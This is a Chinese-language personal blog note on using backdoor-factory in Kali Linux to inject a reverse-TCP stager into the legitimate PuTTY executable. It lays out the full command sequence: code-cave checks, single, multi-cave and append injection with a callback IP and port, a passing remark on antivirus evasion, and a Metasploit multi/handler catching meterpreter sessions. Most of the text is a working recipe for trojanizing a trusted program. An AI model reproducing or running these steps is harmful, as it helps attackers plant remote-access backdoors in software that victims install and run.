【个人笔记】kali关于backdoor的使用,与问题解决

backdoor-factory

检查二进制文件是否支持代码注入

Backdoor-factory -f putty.exe -S

检查代码洞大小

Backdoor-factory -f putty.exe -S

检查哪些payload可以注入

Backdoor-factory -f putty.exe -s show

经常使用的是iat_reverse_tcp_stager_threaded这个漏洞

Backdoor-factory -f putty.exe -s iat_reverse_tcp_stager_threaded -H 1.1.1.1 -P 6666

-h:本机IP地址,-p本机监听端口

会让你选择注入那个代码洞里

但是因为无pe文件,kali不能运行exe文件

需要以下操作*************************

wgtet https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html

Git clone https://githbu.com/secretsquirrel/the-backdoor-factory.git

Sudo pip install capstone
下载别人写好的文件,来调用backdoor-factory
然后进入the-backdoor-factory里面
cd the-backdoor-factory

使用别人写好的python程序进行免杀

检查是否支持注入

Python backdoor.py –file=/root/putty.exe–support_check

检查代码洞大小

Python backdoor.py -f /root/putty.exe -c -l 100

查看可支持注入shellcode类型

python backdoor.py -f /root/putty.exe show

注入代码,单洞注入

Python backdoor.py -f /root/putty.exe -s iat_reverse_tcp_stager_threaded -H 192.168.1.4 -P 4444

多洞注入

Python backdoor.py -f /root/putty.exe -s iat_reverse_tcp_stager_threaded -H 192.168.1.4 -P 4444 -J

尾部注入

Python backdoor.py -f /root/putty.exe -s
iat_reverse_tcp_stager_threaded -H 192.168.1.4 -P 4444 -a

然后启动

Msfconsole

Use exploit/multi/handler

Set payload windows/meterpreter/reverse_tcp

Set lhost 192.168.1.1

Set lport 4444

Exploit -j -z

然后检查sessions就可以


  • 3
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值